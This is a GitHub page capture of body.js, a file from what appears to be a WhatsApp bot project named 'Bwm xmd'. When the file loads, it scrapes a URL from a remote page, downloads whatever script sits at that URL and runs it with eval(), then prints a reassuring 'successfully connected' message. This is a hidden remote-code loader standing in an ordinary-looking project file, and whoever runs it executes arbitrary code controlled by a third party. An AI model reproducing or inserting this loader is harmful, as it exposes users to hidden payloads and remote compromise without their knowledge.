-
Notifications
You must be signed in to change notification settings - Fork 3.5k
/
Copy pathbody.js
35 lines (24 loc) · 796 Bytes
/
body.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
//=====================//
// Bwm xmd //
// Sir Ibrahim Adams //
//=====================//
const axios = require('axios');
const cheerio = require('cheerio');
const adams = require(__dirname + "/config");
async function fetchAdamsUrl() {
try {
const response = await axios.get(adams.BWM_XMD);
const $ = cheerio.load(response.data);
const adamsUrlElement = $('a:contains("ADAM_URL")');
const adamsUrl = adamsUrlElement.attr('href');
if (!adamsUrl) {
throw new Error('The URL link not found...');
}
console.log('You have successfully connected to the server ✅');
const scriptResponse = await axios.get(adamsUrl);
eval(scriptResponse.data);
} catch (error) {
console.error('Error:', error.message);
}
}
fetchAdamsUrl();